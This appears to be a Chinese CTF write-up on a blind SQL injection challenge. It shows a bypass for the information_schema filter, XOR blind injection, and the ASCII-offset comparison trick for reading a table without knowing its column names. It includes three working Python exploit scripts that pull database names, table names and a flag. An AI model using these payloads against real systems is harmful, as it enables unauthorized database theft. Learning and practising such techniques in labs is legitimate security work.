本文详细介绍了SQL注入中遇到的ASCII位偏移技术,以及如何通过位偏移来获取数据库信息。作者通过两个不同的payload展示了如何绕过information_schema过滤,并利用二分法进行字符猜解,最终成功获取到隐藏的flag。文章还提到了在实际操作中遇到的二分查找脚本问题,并分享了解决方案。
前言
前几天一直在忙课程的作业,话说实验课的实验是越来越多了。一直没有抽出时间来做sql注入的题目。这次又做了一道题目,这道题目可以说是让我又长知识了。ascii的位偏移属于是没听说过(x
正文
首先这道题的前端很简单,就是一张网页上贴了一张画以及加了个搜索框。
通过尝试,我们发现,下面这个搜索框可以通过我们输入数字的不同而产生不同回显。但是经过sql字典的fuzz发现他过滤了in也就是说这道题的第一个考点在于information_schema过滤。我们直接用sys.x$schema_flattened_keys来进行绕过。
让我们看一下改变post的数据究竟会让服务器端的响应发生什么变化。
我们发现当payload后面的表达式为真的时候,就会返回Nu1L否则就会返回V&N,基于此我们编写exp如下:
import requests
import time
def start_ascii():
result = ""
url = "http://9640761b-a0fc-457b-bf37-592af5e65e5c.node4.buuoj.cn:81/index.php"
for i in range(1,300):
low = 32
high = 128
mid = (low + high)//2
while(low < high):
# payload = "2||ascii(substr((select(database())),{},1))>{}".format(i, mid)
# payload = "2||ascii(substr((select(group_concat(table_name))from(sys.x$schema_flattened_keys)where((table_schema)=(database()))),{},1))>{}".format(i, mid)
data = {"id": payload}
print(payload)
res = requests.post(url, data=data)
if 'Nu1L' in res.text:
low = mid + 1
else:
high = mid
mid = (low + high)//2
# 跳出循环
if mid == 32 or mid == 127:
break
result = result + chr(mid)
print(result)
if __name__ == "__main__":
start_ascii()
利用上面这个脚本的两个payload我们可以得到,这道题的数据库,以及表名。
上述payload不是唯一的形式,我在之前的一个文章中提到一个问题就是如果一道sql注入的题目它可以接受数字1,那么他就会存在异或盲注的问题。
所以我们的payload还可以写成^(ascii(substr((select(database())),%d,1))>%d)^1的形式。可以达到同样的效果。
接下来就是这道题的重头戏了,无列名注入的另一种方式(不需要union,join)ascii位偏移。
在这里直接贴上一个exp吧
import requests
url='http://9640761b-a0fc-457b-bf37-592af5e65e5c.node4.buuoj.cn:81/index.php'
payload='2||((select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh))'
flag=''
for j in range(200):
for i in range(32,128):
hexchar=flag+chr(i)
py=payload.format(hexchar)
datas={'id':py}
re=requests.post(url=url,data=datas)
if 'Nu1L' in re.text:
flag+=chr(i-1)
print(flag)
break
上面这个exp是市面上普遍在用的脚本。
其中的(select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh)是在进行字符串比较,从第一个字符开始比较,依次比较完字符串中的所有字符。只要在这中间有一个字符出现不相等的情况,则会返回比较结果。为了保持列数的相同,这里的select 1是必要的。
其中最后倒数第三行的i-1很多博主对此的解释是,因为这是顺序遍历所以需要减一以回到两个比较值相等的状态。
下面是我的exp
import requests
import time
def start_ascii():
result = ""
url = "http://9640761b-a0fc-457b-bf37-592af5e65e5c.node4.buuoj.cn:81/index.php"
for i in range(1,300):
low = 32
high = 128
mid = (low + high)//2
while(low < high):
let = result + chr(mid)
payload = '2||((select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh))'.format(let)
data = {"id": payload}
print(payload)
res = requests.post(url, data=data)
if 'Nu1L' in res.text:
high = mid
else:
low = mid + 1
mid = (low + high)//2
# 跳出循环
if mid == 32 or mid == 127:
break
result = result + chr(mid-1)
print(result)
if __name__ == "__main__":
start_ascii()
我这里用的是二分法,与上面的exp相同也要减一
最终的flag如下
需要转换成小写(上交flag的时候需要转换成小写。
后记
这道题总体来说是不难的,虽然仍存在着一个新奇的考点,也学到了ascii的位偏移。但是这道题真正让我产生疑惑的却是我之前一直用的二分查找脚本失效的问题。是真的困扰了我很久,因为一直以来这个脚本的工作质量都还可以,直到遇到了这道题。后来发现是二分查找判断语句中的大于号写反了(我是废物)。
494
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
